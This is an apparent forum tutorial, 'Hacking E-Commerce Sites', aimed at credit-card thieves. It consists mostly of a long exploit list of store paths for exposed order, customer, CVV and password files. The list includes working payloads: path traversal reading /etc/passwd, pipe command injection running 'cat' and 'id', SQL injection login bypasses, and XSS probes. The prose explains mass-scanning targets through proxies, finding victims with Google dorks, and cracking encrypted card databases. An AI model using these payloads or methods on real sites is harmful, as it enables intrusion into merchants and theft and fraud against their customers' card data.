- /comersus/store/comersus_optNewsletterAddemailForm.asp
- /comersus/store/comersus_optPriceListExec.asp
- /comersus/store/comersus_optReviewAddForm.asp
- /comersus/store/comersus_viewitem.asp
- /comersus/store/database
- /comersus/store/database/comersus.mdb
- /comersus/store/databases/comersus.mdb
- /comersus/store/db/store.mdb
- /comersus/store/favicon.ico
- /comersus/store/shopadmin1.asp
- /comersus/store/shopdbtest.asp
- /comersus/store/store/database/comersus.mdb
- /commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
- /commerce/
- /config/orders.txt
- /custdata/
- /customer/
- /customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd
- /customerdata.nsf
- /customers
- /customers.csv
- /customers.xls
- /customers/
- /cvv.csv
- /cvv.dbf
- /cvv.ldf
- /cvv.log
- /cvv.mbf
- /cvv.txt
- /cvv2.csv
- /cvv2.log
- /cvv2.txt
- /cybercash-3.2/conf/merchant_conf
- /cybercash/
- /cybercash/conf/
- /cybercash/conf/merchant_conf
- /data/paypal
- /database/MFIIstore.mdb
- /database/ShopCart2.mdb
- /database/cart32.mdb
- /database/comersus.mdb
- /database/metacart.mdb
- /database/sales.xls
- /database/shopping500.mdb
- /database/virtuastore.mdb
- /database/xshop.mdb
- /db/merchant_conf
- /db/shop.mdb
- /db/store.mdb
- /db_order.txt
- /dc/Orders/orders.txt
- /dcshop/Auth_data/auth_user_file.txt
- /dcshop/Orders/orders.txt
- /dcshop/auth_data/auth_user_file.txt
- /dcshop/orders/orders.txt
- /dcshop_admin.cgi
- /e-cart/
- /eshop.pl/seite=;cat%20eshop.pl|
- /eshop/
- /eshop/10Expand.asp?ProdcutCode=' having 1=1
- /eshop/10Expand.asp?ProductCode='
- /eshop/20Review.asp?ProductCode='
- /eshop/20Reviw.asp?ProductCoce=' having 1=1 --
- /eshop/database/shop.mdb
- /eshop/shop.mdb
- /ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
- /ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
- /fpdb/
- /fpdb/acart.mdb
- /fpdb/acart2.mdb
- /fpdb/acart20.mdb
- /fpdb/acart2_0.mdb
- /fpdb/apstore.mdb
- /fpdb/shop.mdb
- /fpdb/shopping.mdb
- /fpdb/shopping500.mdb
- /fpdb/store.mdb
- /fpdb/storefront.mdb
- /htbin/DCShop/auth_data/auth_user_file.txt
- /htbin/DCShop/orders/orders.txt
- /htbin/cart.pl
- /htbin/orders/orders.txt
- /htbin/shop/auth_data/auth_user_file.txt
- /htbin/shop/orders/orders.txt
- /i-shop/admin/store.log
- /i-shop/admin/store_user_lib.pl
- /i-shoppro/
- /i-shoppro/admin/store.log
- /include/orders.inc
- /ishop/
- /log/xcartdump.sql
- /log_files/my_order.log
- /log_files/order.csv
- /log_files/order.log
- /log_files/order.txt
- /log_files/orders.csv
- /log_orders
- /log_orders/
- /loja/midicart.mdb
- /loja/order-shop.dat
- /loja/order.txt
- /loja/pkg/catalog/extras/orders/
- /main/webcash
- /mall/Auth_data/auth_user_file.txt
- /mall/Orders/orders.txt
- /mall/auth_data/auth_user_file.txt
- /mall/orders/orders.txt
- /mall_log_files
- /mall_log_files/
- /mall_log_files/order.log
- /mcartfree/database/metacart.mdb
- /members/webcash
- /merchants/admin.pw
- /metacart/database/metacart.mdb
- /midicart.mdb
- /midicart_asp/shop/midicart.md
- /midicart_asp/shop/midicart.mdb
- /modules/paypal.php
- /msbill
- /msbill/msbilllog.txt
- /mtdata/mtstore.nsf
- /mtstore.nsf
- /my_order.log
- /my_orders.log
- /myorder.log
- /myorder.txt
- /myorderlog.txt
- /myorders.log
- /netbilling
- /online-store/scstore/
- /online-store/scstore/scpages/
- /onlinepurchase
- /onlinepurchase/
- /onlinepurchase/authorization/account.asp?accnumber=100000001
- /order
- /order-shop.dat
- /order.log
- /order.sql
- /order.txt
- /order/
- /order/admin
- /order/admin/
- /order/cartmanager.cgi
- /order/compatible.cgi
- /order/db_manager.cgi
- /order/jadat.asp
- /order/order.dat
- /order/order.log
- /order/order_log.dat
- /order/order_log_v12.dat
- /order/shop-oder.dat
- /order1.log
- /order_log_v12.dat
- /orderdetalis.aspx
- /orderform/orders.txt
- /orderinfo.txt
- /orders
- /orders*
- /orders.htm
- /orders.inc
- /orders.log
- /orders.mdb
- /orders.php
- /orders.sql
- /orders.txt
- /orders/
- /orders/%3f.jsp
- /orders/*
- /orders/*.olf
- /orders/?open
- /orders/WS_FTP.ini
- /orders/admin
- /orders/admin.asp
- /orders/admin/
- /orders/cart.pl
- /orders/cartmanager.cgi
- /orders/checks.txt
- /orders/db_manager.cgi
- /orders/import.txt
- /orders/info.xml
- /orders/jadat.dat
- /orders/mountain.cfg
- /orders/order-shop.dat
- /orders/order.log
- /orders/order.txt
- /orders/order_log.dat
- /orders/order_log_v12.dat
- /orders/orders.log
- /orders/orders.txt
- /orders/results
- /orders/track.db
- /orders?open
- /ordersorders.txt
- /oscommerce/
- /oscommerce/catalog/
- /oscommerce/catalog/admin/
- /oscommerce/catalog/admin/orders.php
- /oscommerce/default.php
- /payment.mart
- /payment/
- /payments/
- /paypal/command
- /paypal/test.txt
- /paypal/test2.txt
- /paypal/test3.txt
- /paypal/test4.txt
- /paytest.php
- /pdg_cart/order.log
- /private-cgi-bin/cart32/1.txt
- /private-cgi-bin/cart32/2.txt
- /private-cgi-bin/cart32/3.txt
- /private-cgi-bin/cart32/4.txt
- /private-cgi-bin/cart32/5.txt
- /private-cgi-bin/cart32/6.txt
- /private-cgi-bin/cart32/7.txt
- /productcart/AspShipCalc/
- /productcart/UPSLicense/
- /productcart/charts/
- /productcart/database/
- /productcart/database/EIPC.mdb
- /productcart/includes/
- /productcart/includes/adminv.asp
- /productcart/includes/diagtxt.txt
- /productcart/includes/opendb.asp
- /productcart/includes/status.inc
- /productcart/pc/
- /productcart/pc/Custva.asp
- /productcart/pc/pcadmin/
- /productcart/pcadmin/
- /productcart/pcadmin/login.asp
- /productcart/pcadmin/login.asp?idadmin=' or '1'='1
- /productcart/pcadmin/login.asp?idadmin='' or 1=1--
- /productcart/pcadmin/login_1.asp
- /productcart/pdadmin/login.asp?idadmin=' having 1=1 --
- /productcart/setup_2/
- /produccart/pdacmin/login.asp
- /purchase
- /purchase/
- /purchases
- /purchases/
- /q-shop25/admin/security.asp
- /q-shop25/inc/conx.asp
- /qshop/db/store.mdb
- /qshop/store.mdb
- /quickstore.cfg
- /quikstore.cfg
- /quikstore.cgi
- /quikstore.cgi?blah&template=../../../../../../../../../../../../etc/hosts
- /quikstore.cgi?blah&template=../../../../../../../../../../../../usr/bin/id|
- /quikstore.cgi?blah&template=../../../../../../../../../../etc/passwd%00.html
- /quikstore.cgi?store='
- /s-cart/
- /s-cart/admin
- /s-cart/admin/
- /sales
- /sales.csv
- /sales.xls
- /sales/
- /scart.mdb/ashopkart20+-+ashoptkart20/admin
- /scripts/DCShop/auth_data/auth_user_file.txt
- /scripts/DCShop/orders/orders.txt
- /scripts/cart.pl
- /scripts/cart32.exe
- /scripts/cart32.exe/cart32clientlist
- /scripts/cart32.exe/cart32clientlist?passwd=wemilo
- /scripts/orders/orders.txt
- /scripts/shop/auth_data/auth_user_file.txt
- /scripts/shop/orders/orders.txt
- /scripts/webcash/
- /scripts/webcash/.dbusers.db
- /scripts/webcash/.htaccess
- /scripts/webcash/.htpasswd
- /scripts/webcash/.htusers
- /scripts/webcash/.passwrd
- /scripts/webcash/WS_FTP.LOG
- /scripts/webcash/crontab.txt
- /scripts/webcash/expire.txt
- /scripts/webcash/htusers
- /scripts/webcash/robots.txt
- /secure/cart.pl
- /secure/order-shop.dat
- /secure/order.log
- /secure/order.txt
- /secure/orders
- /secure/orders*
- /secure/orders.secure
- /secure/orders/
- /secure/orders/jadat.dat
- /secure/orders/order-shop.dat
- /secure/orders/order.txt
- /secure/secure/order-shop.dat
- /secure/secure/order.txt
- /shipping/
- /shop
- /shop.asp'
- /shop.asp()
- /shop.asp)
- /shop.cgi
- /shop.mdb
- /shop.pl
- /shop/
- /shop/
- /shop/%00
- /shop/%3f.jsp
- /shop//include/
- /shop/0%20WEB%20CATEGORIES
- /shop/?category=xxxxxx&parent=0&page=x&/'
- /shop/?open
- /shop/ADMIN/login.ASP
- /shop/Admin_files/commerce.cgi
- /shop/Auth_data/auth_user_file.txt
- /shop/DCShop/Auth_data/auth_user_file.txt
- /shop/DCShop/Orders/orders.txt
- /shop/DCShop/auth_data/auth_user_file.txt
- /shop/DCShop/orders/orders.txt
- /shop/Orders/orders.txt
- /shop/Smarty-2.5.0/
- /shop/Smarty-2.5.0/Smarty.class.php
- /shop/WEB-INF/
- /shop/WEB-INF/ShopTags.tld
- /shop/WEB-INF/classes/
- /shop/WEB-INF/classes/db.properties
- /shop/WEB-INF/lib/
- /shop/WEB-INF/lib/mysql-connector-java-2.0.14-bin.jar
- /shop/WEB-INF/web.warContent
- /shop/WEB-INF/web.xml
- /shop/WSFTP.LOG
- /shop/WS_FTP.INI
- /shop/WS_FTP.LOG
- /shop/WS_FTP.LOG/?open
- /shop/WS_FTP.LOG?open
- /shop/WS_FTP.ini
- /shop/WS_fTP.log
- /shop/Web.Config
- /shop/_vti_cnf/form_results.htm
- /shop/_vti_cnf/form_results.html
- /shop/_vti_cnf/form_results.txt
- /shop/_vti_cnf/order.log
- /shop/_vti_cnf/order.txt
- /shop/add.jsp
- /shop/admin
- /shop/admin.asp
- /shop/admin.html
- /shop/admin/
- /shop/admin/Admin.asp
- /shop/admin/WS_FTP.LOG
- /shop/admin/category_detail.php
- /shop/admin/config.inc.php
- /shop/admin/db.sql
- /shop/admin/default.asp
- /shop/admin/detail.php
- /shop/admin/footer.php
- /shop/admin/graphics/
- /shop/admin/header.php
- /shop/admin/index.php
- /shop/admin/jscript/
- /shop/admin/list_categories.php
- /shop/admin/login.asp
- /shop/admin/mysql.info.php
- /shop/admin/shop_login.htm
- /shop/administrador.asp
- /shop/auth_data/auth_user_file.txt
- /shop/authorize.csv
- /shop/authorizenet.log
- /shop/authorizenets.old
- /shop/backlink.js
- /shop/card.csv
- /shop/card.log
- /shop/card.txt
- /shop/cart.pl
- /shop/cart.sql
- /shop/cartmanager.cgi
- /shop/category1.tpl
- /shop/cc.csv
- /shop/cc.log
- /shop/cc.txt
- /shop/ccv.csv
- /shop/ccv.log
- /shop/ccv.txt
- /shop/cgi-bin/DCShop/
- /shop/cgi-bin/DCShop/Orders/
- /shop/cgi-bin/DCShop/dcprotect.pl
- /shop/cgi-bin/DCShop/dcshop_admin.cgi
- /shop/cgi-bin/DCShop/dcshop_admin.setup
- /shop/checkout.php
- /shop/checkoutdb.php
- /shop/client.eml
- /shop/code.php
- /shop/code.php3
- /shop/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
- /shop/compatible.cgi
- /shop/conf/
- /shop/conf/merchant_conf
- /shop/config.inc.php
- /shop/configure.php
- /shop/create.jsp
- /shop/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd
- /shop/customer/home.php
- /shop/customers.csv
- /shop/customers.xls
- /shop/cvv.csv
- /shop/cvv.log
- /shop/cvv.txt
- /shop/cvv2.csv
- /shop/cvv2.log
- /shop/cvv2.txt
- /shop/cybercash/
- /shop/cybercash/conf/merchant_conf
- /shop/data.info
- /shop/data/
- /shop/data/info.dat
- /shop/database.mdb
- /shop/database/
- /shop/database/metacart.mdb
- /shop/database/virtuastore.mdb
- /shop/db
- /shop/db.xml
- /shop/db/
- /shop/db/%3f.jsp
- /shop/db/PTSC.mdb
- /shop/db/database.mdb
- /shop/db/merchant_conf
- /shop/db_manager.cgi
- /shop/dcshop/Auth_data/auth_user_file.txt
- /shop/dcshop/Orders/orders.txt
- /shop/dcshop/auth_data/auth_user_file.txt
- /shop/dcshop/orders/orders.txt
- /shop/diag_dbtest.asp
- /shop/diagnose.cgi
- /shop/docreate.jsp
- /shop/dologin.jsp
- /shop/dosearch.jsp
- /shop/entry.dat
- /shop/eshop.pl/seite=;cat%20eshop.pl|
- /shop/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
- /shop/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
- /shop/iclude/
- /shop/idbC.dat
- /shop/include/func.php
- /shop/info.php
- /shop/info.php3
- /shop/info.xml
- /shop/jadat.dat
- /shop/lists.csv
- /shop/log/
- /shop/log/imglog.txt
- /shop/log/index.html
- /shop/log/x-errors_php.txt
- /shop/log/x-errors_sql.txt
- /shop/log/xcartdump.sql
- /shop/log_files/
- /shop/member_html.cgi?file=;cat%20/etc/passwd|
- /shop/member_html.cgi?file=|cat%20/etc/passwd|
- /shop/midcart.mdb
- /shop/midicart.mdb
- /shop/normal_html.cgi?file=<script>alert(;\"Vulnerable\")</script>
- /shop/normal_html.cgi?file=../../../../../../etc/issue%00
- /shop/normal_html.cgi?file=;cat%20/etc/passwd|
- /shop/normal_html.cgi?file=;id|
- /shop/normal_html.cgi?file=|cat%20/etc/passwd|
- /shop/normal_html.cgi?file=|id|
- /shop/order-shop.dat
- /shop/order.log
- /shop/order.txt
- /shop/order/order.log
- /shop/orderdetalis.aspx
- /shop/orders.inc
- /shop/orders.log
- /shop/orders/jadat.dat
- /shop/orders/order-shop.dat
- /shop/orders/order.txt
- /shop/orders/orders.txt
- /shop/owner
- /shop/php_files/site.config.php
- /shop/php_files/site.config.php+
- /shop/phpinfo.php
- /shop/phpinfo.php3
- /shop/product.asp
- /shop/product.ast
- /shop/provider/
- /shop/provider/import.php
- /shop/provider/product_modify.php
- /shop/readme.txt
- /shop/registry.dat
- /shop/sales.csv
- /shop/scripts/
- /shop/search.php
- /shop/search.php?q='
- /shop/secure/
- /shop/shop.dat
- /shop/shop.db
- /shop/shop.sql
- /shop/shop/shop.dat
- /shop/shopdbtest.asp
- /shop/show.php
- /shop/show.php?q='
- /shop/show_cart.inc.php
- /shop/stats.php
- /shop/system
- /shop/system/
- /shop/tep_admin-pr2.1/admin/
- /shop/tep_admin-pr2.1/admin/orders.php
- /shop/termofuse.html
- /shop/test.log
- /shop/vars
- /shop/vars.txt
- /shop/web.xml
- /shop/ws%5fftp.ini
- /shop/ws_%66tp.ini
- /shop/ws_f%74p.ini
- /shop/ws_ft%70.ini
- /shop/ws_ftp%2eini
- /shop/ws_ftp.%69ni
- /shop/ws_ftp.i%6ei
- /shop/ws_ftp.in%69
- /shop/ws_ftp.ini
- /shop/ws_ftp.log
- /shop?open
- /shop_login.asp
- /shopa_sessionlist.asp
- /shopadmin.asp
- /shopadmin.asp
- /shopadmin.mdb
- /shopadmin1.asp
- /shopadmin_login.htm
- /shopcart/
- /shopcart/ShopCart2.mdb
- /shopcart/database/ShopCart2.mdb
- /shopdb/
- /shopdbtest.asp
- /shopexd.asp
- /shoponline/fpdb/shop.mdb
- /shoponline/fpdb/shop.mdb
- /shopper
- /shopper.cgi?preadd=action&key=PROFA&template=order.log
- /shopper.cgi?preadd=action&key=PROFA&template=order1.log
- /shopper.conf
- /shopper.exe/cgi-bin/.../shopper.conf
- /shopper.exe?display=action&template=order.log
- /shopper/
- /shopping
- /shopping.mdb
- /shopping/
- /shopping/%3f.jsp
- /shopping/Auth_data/auth_user_file.txt
- /shopping/Orders/orders.txt
- /shopping/WSFTP.LOG
- /shopping/WS_FTP.INI
- /shopping/WS_FTP.LOG
- /shopping/WS_FTP.LOG/?open
- /shopping/WS_FTP.LOG?open
- /shopping/WS_FTP.ini
- /shopping/WS_fTP.log
- /shopping/Web.Config
- /shopping/admin
- /shopping/admin.asp
- /shopping/admin/
- /shopping/admin/orders.php
- /shopping/auth_data/auth_user_file.txt
- /shopping/cartmanager.cgi
- /shopping/code.php3
- /shopping/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
- /shopping/compatible.cgi
- /shopping/data.info
- /shopping/database/comersus.mdb
- /shopping/database/metacart.mdb
- /shopping/db_manager.cgi
- /shopping/diag_dbtest.asp
- /shopping/diagnose.cgi
- /shopping/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
- /shopping/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
- /shopping/idbC.dat
- /shopping/info.dat
- /shopping/info.xml
- /shopping/log_files/
- /shopping/midicart.mdb
- /shopping/orders/jadat.dat
- /shopping/orders/order-shop.dat
- /shopping/orders/order.txt
- /shopping/orders/orders.txt
- /shopping/resgistry.dat
- /shopping/secure/
- /shopping/secure/orders/
- /shopping/shop.mdb
- /shopping/shopadmin_login.htm
- /shopping/shopdbtest.asp
- /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>","<script>alert('test')</script>
- /shopping/shopping.mdb
- /shopping/shopping200.mdb
- /shopping/shopping300.mdb
- /shopping/shopping400.mdb
- /shopping/shopping450.mdb
- /shopping/shopping500.mdb
- /shopping/shopsearch.asp
- /shopping/vars.txt
- /shopping/ws%5fftp.ini
- /shopping/ws_%66tp.ini
- /shopping/ws_f%74p.ini
- /shopping/ws_ft%70.ini
- /shopping/ws_ftp%2eini
- /shopping/ws_ftp.%69ni
- /shopping/ws_ftp.i%6ei
- /shopping/ws_ftp.in%69
- /shopping/ws_ftp.ini
- /shopping/ws_ftp.log
- /shopping200.mdb
- /shopping300.mdb
- /shopping400.mdb
- /shopping450.mdb
- /shopping500.mdb
- /shopping_cart
- /shopping_cart/
- /shopping_cart/0%20WEB%20CATEGORIES
- /shopping_cart/WS_FTP.LOG
- /shopping_cart/admin/
- /shopping_cart/admin/WS_FTP.LOG
- /shopping_cart/admin/category_detail.php
- /shopping_cart/admin/config.inc.php
- /shopping_cart/admin/db.sql
- /shopping_cart/admin/detail.php
- /shopping_cart/admin/footer.php
- /shopping_cart/admin/graphics/
- /shopping_cart/admin/header.php
- /shopping_cart/admin/index.php
- /shopping_cart/admin/jscript/
- /shopping_cart/admin/list_categories.php
- /shopping_cart/admin/mysql.info.php
- /shopping_cart/backlink.js
- /shopping_cart/checkout.php
- /shopping_cart/checkoutdb.php
- /shopping_cart/config.inc.php
- /shopping_cart/configure.php
- /shoppingdirectory/midicart.mdb
- /shoppping/administrador.asp
- /shoppping/secure/orders.secure
- /shoppping/tables.sql
- /shopsearch.asp
- /show_cart.inc.php
- /store
- /store*
- /store.mdb
- /store/
- /store/./
- /store/./WEB-INF/
- /store/./WEB-INF/ShopTags.tld
- /store/./WEB-INF/classes/
- /store/./WEB-INF/lib/
- /store/./WEB-INF/web.xml
- /store//DCShop/dcshop_admin.cgi
- /store/?open
- /store/Admin_files/
- /store/Admin_files/_vti_cnf/form_results.txt
- /store/Admin_files/_vti_cnf/order.log
- /store/Admin_files/myorderlog.txt
- /store/Admin_files/order.log
- /store/Admin_files/orders.txt
- /store/WEB-INF/
- /store/WEB-INF/ShopTags.tld
- /store/WEB-INF/classes/
- /store/WEB-INF/lib/
- /store/WEB-INF/web.xml
- /store/WSFTP.LOG
- /store/WS_FTP.INI
- /store/WS_FTP.LOG
- /store/WS_FTP.LOG/?open
- /store/WS_FTP.LOG?open
- /store/WS_FTP.ini
- /store/WS_fTP.log
- /store/Web.Config
- /store/_vti_cnf/form_results.htm
- /store/_vti_cnf/form_results.html
- /store/_vti_cnf/form_results.txt
- /store/_vti_cnf/order.log
- /store/_vti_cnf/order.txt
- /store/admin
- /store/admin.dat
- /store/admin.pass
- /store/admin.passwd
- /store/admin/
- /store/admin/admin.dat
- /store/admin/default.asp
- /store/admin_files/
- /store/admin_files/_vti_cnf/
- /store/admin_files/_vti_cnf/form_results.txt
- /store/admin_files/order.log
- /store/agora.cgi
- /store/cart.cgi
- /store/cart.pl
- /store/cartmanager.cgi
- /store/category1.tpl
- /store/client.eml
- /store/comersus.mdb
- /store/comersus/comersus.mdb
- /store/comersus/database/comersus.mdb
- /store/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
- /store/compatible.cgi
- /store/create.jsp
- /store/customers/
- /store/database.dat
- /store/database.db
- /store/database.nsf
- /store/database.sql
- /store/database/comersus.mdb
- /store/database/sql
- /store/daten/
- /store/db.xml
- /store/db/
- /store/db/database.mdb
- /store/db/store.mdb
- /store/dcshop_admin.cgi
- /store/docreate.jsp
- /store/dologin.jsp
- /store/dosearch.jsp
- /store/entry.dat
- /store/idbC.dat
- /store/index.cgi?page=../../../../../../../../etc/passwd
- /store/index.js0x70
- /store/info.xml
- /store/lib.inc
- /store/lib.inc.php
- /store/lists.csv
- /store/log_files/
- /store/order.log
- /store/order.sql
- /store/orderdetalis.aspx
- /store/orders
- /store/orders.log
- /store/orders.mdb
- /store/orders.sql
- /store/pgp_encrypt/cc_store_lib.pm
- /store/pgp_encrypt/order_admin.cgi
- /store/pgp_encrypt/pgp_lib.pm
- /store/pgp_encrypt/print_invoice.cgi
- /store/pgp_encrypt/process.cgi
- /store/pgp_encrypt/store_admin.cgi
- /store/pgp_encrypt/store_params.cgi
- /store/pgp_encrypt/validate_card.pm
- /store/quikstore.cgi?store='
- /store/secure/
- /store/show_cart.inc.php
- /store/stats.php
- /store/store.dat
- /store/store.db
- /store/store.log
- /store/store.mdb
- /store/store.nsf
- /store/store.sql
- /store/storeadmin
- /store/storeadmin/
- /store/temp_customers/
- /store/temp_orders/
- /store/test.log
- /store/vars.txt
- /store/web.xml
- /store/ws%5fftp.ini
- /store/ws_%66tp.ini
- /store/ws_f%74p.ini
- /store/ws_ft%70.ini
- /store/ws_ftp%2eini
- /store/ws_ftp.%69ni
- /store/ws_ftp.i%6ei
- /store/ws_ftp.in%69
- /store/ws_ftp.ini
- /store/ws_ftp.log
- /storeadmin
- /storeadmin/
- /storefront.mdb
- /storefrontpro50.tem/
- /storemgr/
- /stores/
- /stores/registry.dat
- /usersorder/
- /usersorders/
- /virtuastore.mdb
- /virtuastore/
- /virtuastore/database/virtuastore.mdb
- /web_store.cgi
- /webcart
- /webcart-lite
- /webcart-lite/
- /webcart-lite/config/clients.txt
- /webcart-lite/config/import.txt
- /webcart-lite/orders/import.txt
- /webcart/
- /webcart/carts
- /webcart/carts/
- /webcart/config/
- /webcart/config/clients.txt
- /webcart/orders/
- /webcart/orders/carts/.txt
- /webcart/orders/import.txt
- /webcash
- /webcash/
- /webcash/.dbusers.db
- /webcash/.htaccess
- /webcash/.htlilyfire
- /webcash/.htpass-4.new
- /webcash/.htpasswd
- /webcash/.htpasswd.aknk
- /webcash/.htpasswd.nten
- /webcash/.htpasswd.slez
- /webcash/.htusers
- /webcash/.passwrd
- /webcash/.pwd
- /webcash/_privat/.htpasswd
- /webcash/access/.htpasswd
- /webcash/acctman/info/.htpasswd
- /webcash/admin/db/htpasswd
- /webcash/ats/logs/writeto.txt
- /webcash/ccbill/.htpasswd
- /webcash/ccbill/members/.htpasswd
- /webcash/ccbill/password/.htpasswd
- /webcash/ccbill/secure/ccbill.log
- /webcash/cgi-bin/am/codes/htpasswd
- /webcash/cgi-bin/database/passwords
- /webcash/cgi-bin/ib/data/htpasswd
- /webcash/cgi-bin/mastergate/passwords
- /webcash/cgi-bin/passwd/.htpasswd
- /webcash/cgi-bin/passwords
- /webcash/cgi-bin/test.cgi
- /webcash/cgi-bin2/ampro/info/.htpasswd
- /webcash/cgibin/.htpasswd
- /webcash/cgibin/ibp5/passwords.temp
- /webcash/cgibin/mastergate/passwords
- /webcash/cgibin/members/htdata/.htpasswd
- /webcash/cgibin/passwords
- /webcash/client.log
- /webcash/cohfmembers/.htpasswd
- /webcash/crontab.txt
- /webcash/data/passwdfile
- /webcash/database/.pnppasswd
- /webcash/deep/.htpasswd
- /webcash/dmr/.htpasswd.ass
- /webcash/drowssap/.htpasswd
- /webcash/expire.txt
- /webcash/htusers
- /webstore/
- /webstore/Admin_files/
- /webstore/addcustomer.php
- /webstore/admin/addcustomer.php
- /xcart/customer/auth.php?config[General][shop_closed]=Y&shop_closed_file=../../../../../../../etc/passwd
- /xdatabase/MFIIstore.ldb
- /xdatabase/MFIIstore.mdb
- /xshop.mdb
- /~authorizenet.cgi
- /~cgi-bin/authorizenet.cgi/
- /~webcash
- /~webcash/
Hacking E-Commerce Sites
by Murder Mouse
Section 0: The Disclaimer
As covered on the main site all information presented within this guide is for information purposes only. Any attempt to use the information within this guide to commit anything illegal is solely the responsibility of the reader, and neither I, Information Leak, nor anyone else affiliated is responsible for what you do with the following information.
Section 1: The Introduction
Originally I was working on a security scanner for ecommerce sites, but since I'm about to get back into school and won't have as much time as before to really work on many projects I decided it'd be better to just go ahead and write a tutorial on the subject. So for this tutorial we will talk about one way a carder would collect CCs to cash/use/sell/whatever, and that of course is exploiting ecommerce sites. There are millions of sites out there used by businesses large and small for peddling their services/merchandise, and needless to say there are plenty of them out there that are easily exploited. So here it is, the answer to every "how to hack cc" question out there. Enjoy...
Section 2: Database Vulnerabilities
One of the most common and easiest ways to exploit ecommerce sites is to use database vulnerabilities. These are present due to insecure database software that many ecommerce sites will use for recording and tracking online purchases. One method that an attacker could use to find such database vulnerabilities on a specific site is to use an exploiter. Exploiters are software that will use an exploit list to scan for exploits on a target web server, and report back any positive responses. CMXploiter IV (http://xtremet.deny.de/downloads/cmxiv_setup.exe) is an example of an exploiter, though there are others that you can look for to use as well. The interface for CMXploiter IV is pretty self-explanatory, but I'll run you through the basics anyway. To use this tool you would first click "Load", which will bring up three different tabs. You would click "Exploit Lists" to select an exploit list to use, "Proxy List" is to of course select a list of proxies to use, and "URL List" is to select a list of targets to scan. Then from there you would go to Options. The first menu to pop up is the Current Session Options. Edit the responses to include in session history so that only the "200 Series responses" (positive responses) are included in the results, and from here you can also edit the "Socket Timeout value" based on your internet connection (leave as is for faster internet connections, set to 40 for slower internet connections). Then go to Proxy List Selection Options and either put in the proxy you are going to use for the scan, or click "Multi-Proxy Mode" to tell CMXploiter IV to use the proxy list you loaded. Now that you have everything configured go to Start and select the type of scan you want to do. "Single URL Scan" is used to scan a single server with the exploit list provided, "Multi-URL Scan" is used to scan every site in the url list for every exploit in the exploit list, and "Single Exploit Scan" is used to scan every site in the url list for a single exploit. On a last note with any exploiter you use if the option is available be sute to set it to use GET requests instead of HEAD requests for the scan. I've found that you get much more accurate results that way. Now that I've covered all the configurations I'm going to provide an exploit list that you could use for scanning database vulnerabilities...
The only problem with database vulnerabilities for a carder is that some of these don't reveal the cvv2 of the card number, which is of course usually needed to use the cc (except of course with many online shopping sites that you can simply put 000 or 0000 as the cvv2). Also many of the databases are encrypted using either blowfish or rc4. You can use John the Ripper (http://www.openwall.com/john/) to crack blowfish, and I'm sure there are some crackers out there that you can use to crack rc4. Here are some examples of each encryption provided by esc from the Igniteds community of each encryption...
RC4 = *xco[aOßI
Blowfish= |AA|BC|
Good luck.
Section 3: Google Syntax
A quick tip for finding database vulnerabilities besides scanning for them using an exploiter is to use googledorks. To do this just take the exploit you're interested in looking for, and for example add an inurl: to the search. For example "inurl:xshop.mdb" could be used to find all the sites that the google spider has found that contain this file (except of course the sites that blocked this file from being listed using a robots.txt for example).
Section 4: SQL Injection
Of course what remains a very popular method for exploiting ecommerce sites is to use SQL injection. It has been covered many times, and is very common among web servers. Since it has been covered so many times I will simply include a list of guides that you can read to familiarize yourself with SQL injection. This list will include the names and location of the guides, and if for some reason any of the links become broken just slap the title of the guide into quotations on google and search for them...
Advanced SQL Injection: http://www.ngssoftware.com/papers/advan ... ection.pdf ... ection.pdf
More Advanced SQL Injection: http://www.stickyminds.com/getfile.asp? ... ame1%2Epdf? ... ame1%2Epdf
Demystifying SQL Injections: http://www.informationleak.net/sql_inject.txt
XSS & SQL Injection:http://www.hackthissite.org/articles/read/23
Section 5: The Conclusion
Well that's the conclusion for this guide. There are other methods as with any type of web server that could be used to exploit ecommerce sites, but this tutorial is meant as a basic rundown of some methods that could be used. If you are doing a security scan for an ecommerce site and come across a vulnerability that you are not familiar with, or don't know how to use to test don't be afraid to just google it. I'd also like to briefly thank s4mael from CCPower, who put together the exploit list that the database vulnerabilities listed were copied from. Also if you have any questions or comments then feel free to email me at murdermouse@informationleak.net. I must remind you before you do so that I'm not a carder, nor do I provide any type of services to any. Don't ask me if I have cc's, I don't have cc's and I will not help you get cc's.
Link: http://www.informationleak.org/viewtopic.php?f=46&t=5129#47775
Rating: - 0 out of 0 votes